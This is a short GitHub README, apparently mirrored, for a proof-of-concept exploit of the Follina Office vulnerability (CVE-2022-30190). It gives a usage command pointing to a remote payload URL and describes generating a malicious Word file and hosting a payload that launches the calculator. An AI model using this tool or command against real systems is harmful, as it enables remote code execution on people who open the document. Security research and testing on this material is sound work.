ItsNee / Follina-CVE-2022-30190-POC

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Follina-CVE-2022-30190 Proof of Concept by Nee

Usage

python3 follina.py --payload-url "http://192.168.200.144:1337/pwn.html"

What it does

  • Creates a malicious word file which points to the payload url that you specify
  • Hosts the default payload located in the web folder

Proof Of Concept Pops calc by default

Feel free to make changes and push :)

pwn.gif

About


Languages

Language:HTML 77.2%Language:Python 22.8%